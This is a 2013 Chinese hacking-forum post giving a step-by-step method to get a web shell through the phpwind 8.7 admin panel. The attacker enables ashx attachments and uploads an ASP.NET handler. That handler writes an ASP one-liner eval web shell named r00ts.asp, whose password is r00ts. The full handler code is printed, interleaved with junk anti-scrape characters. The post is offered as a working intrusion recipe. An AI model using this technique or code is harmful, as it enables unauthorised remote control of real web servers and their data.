找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2630|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小# W' m4 W8 ], S: f, U' e
; s) z+ b: Q: a3 u- H0 ^
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
6 A; e! v/ O2 W  p % v' l5 \( _9 t5 }# E: {
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
5 t, i2 g5 N4 D/ ~- r' x% y 8 E# d* g/ o, U$ q
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx" w8 y& k( c' w6 w8 }
0 K2 a. L  ?9 Z& @# p* K
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
  s$ E8 p5 X1 Y' W
" q9 l: U, Z/ a. j下面是代码:
2 P+ ~- J3 p5 j7 ?+ s  l % e* I8 i, V3 ]
<%@ WebHandler Language="C#"Class="Handler" %>
: o5 B: H# y% [, V0 musing System;/ w3 _5 V5 p; f9 _( a
using System.Web;2 [$ [/ Y+ N  H
using System.IO;& }( S$ R3 m8 ^) G. V2 E
public class Handler : IHttpHandler {
! U# H! N( m+ `% Y5 w: w0 fpublic void ProcessRequest (HttpContext context) {
3 n' Z8 T' ^( F7 E1 Tcontext.Response.ContentType = "text/plain";0 n' ^6 K* i; n
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
$ v, h$ c* h! N% P* M" s# pfile1.Write("<%eval request(\"r00ts\")%>");  J, }3 W6 G# M
file1.Flush();, P6 S) f2 \/ @3 b* b$ l
file1.Close();  E# \& b+ U* Z
}
7 ]8 ?0 r  N! f5 Ppublic bool IsReusable {/ ]' X7 _: ~1 {# ^( P  n
get {0 }; y7 ~- x5 d+ T% N
return false;7 R! N; C4 M' g1 L; f/ i+ z
}
' `" c# f' C/ k' _, y- m" F; ^}) U* J8 J1 F5 M& E: ?
}/ o# D+ f% c! z! m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表